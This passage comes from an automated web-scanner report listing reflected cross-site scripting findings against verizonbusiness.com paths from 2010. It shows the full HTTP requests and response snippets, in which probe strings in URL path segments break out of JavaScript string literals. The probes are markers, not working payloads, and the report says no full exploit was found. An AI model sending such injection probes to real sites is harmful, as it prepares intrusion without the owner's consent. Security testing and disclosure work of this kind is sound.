<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security334c1";90e38324e5c/compliance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.274. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98497'%3bb6aa04ab29f was submitted in the REST URL parameter 2. This input was echoed as 98497';b6aa04ab29f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security98497'%3bb6aa04ab29f/compliance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:51 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42323
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:51 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products/security98497';b6aa04ab29f/compliance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.275. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c393"%3b1b44efc9356 was submitted in the REST URL parameter 3. This input was echoed as 6c393";1b44efc9356 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/compliance6c393"%3b1b44efc9356/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43500
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/compliance6c393";1b44efc9356/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.276. http://www.verizonbusiness.com/Products/security/compliance/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/compliance/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f556'%3b76926c98ffb was submitted in the REST URL parameter 3. This input was echoed as 6f556';76926c98ffb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/compliance6f556'%3b76926c98ffb/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43498
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/compliance6f556';76926c98ffb/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.277. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e45f3"%3be040c4a5448 was submitted in the REST URL parameter 1. This input was echoed as e45f3";e040c4a5448 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productse45f3"%3be040c4a5448/security/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40644
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productse45f3";e040c4a5448/security/dbir/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.278. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4d88'%3bd2979abd42a was submitted in the REST URL parameter 1. This input was echoed as a4d88';d2979abd42a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsa4d88'%3bd2979abd42a/security/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40646
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Productsa4d88';d2979abd42a/security/dbir/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.279. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86844'%3b6d7b65f2563 was submitted in the REST URL parameter 2. This input was echoed as 86844';6d7b65f2563 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security86844'%3b6d7b65f2563/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:14 GMT
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security86844';6d7b65f2563/dbir/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.280. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17ff"%3b0da22e90ce6 was submitted in the REST URL parameter 2. This input was echoed as e17ff";0da22e90ce6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/securitye17ff"%3b0da22e90ce6/dbir/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:05 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42309
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:05 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:05 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/securitye17ff";0da22e90ce6/dbir/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.281. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61590"%3b2634f074896 was submitted in the REST URL parameter 3. This input was echoed as 61590";2634f074896 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/dbir61590"%3b2634f074896/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:24 GMT
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
h(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security/dbir61590";2634f074896/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.282. http://www.verizonbusiness.com/Products/security/dbir/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/dbir/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fcbd8'%3b2739f8fe961 was submitted in the REST URL parameter 3. This input was echoed as fcbd8';2739f8fe961 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security/dbirfcbd8'%3b2739f8fe961/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:09 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43486
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/security/dbirfcbd8';2739f8fe961/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.283. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c02'%3bb0cbf4d2de8 was submitted in the REST URL parameter 1. This input was echoed as 49c02';b0cbf4d2de8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products49c02'%3bb0cbf4d2de8/security/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/Products49c02';b0cbf4d2de8/security/icsa-labs/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.284. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23105"%3b261e89ec928 was submitted in the REST URL parameter 1. This input was echoed as 23105";261e89ec928 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products23105"%3b261e89ec928/security/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:58 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40654
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products23105";261e89ec928/security/icsa-labs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.285. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31165"%3ba248f0d3063 was submitted in the REST URL parameter 2. This input was echoed as 31165";a248f0d3063 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security31165"%3ba248f0d3063/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/security31165";a248f0d3063/icsa-labs/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR S
...[SNIP]...

1.286. http://www.verizonbusiness.com/Products/security/icsa-labs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/security/icsa-labs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d5'%3b88c3c18ede8 was submitted in the REST URL parameter 2. This input was echoed as 669d5';88c3c18ede8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/security669d5'%3b88c3c18ede8/icsa-labs/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:54 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42319
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:54 GMT
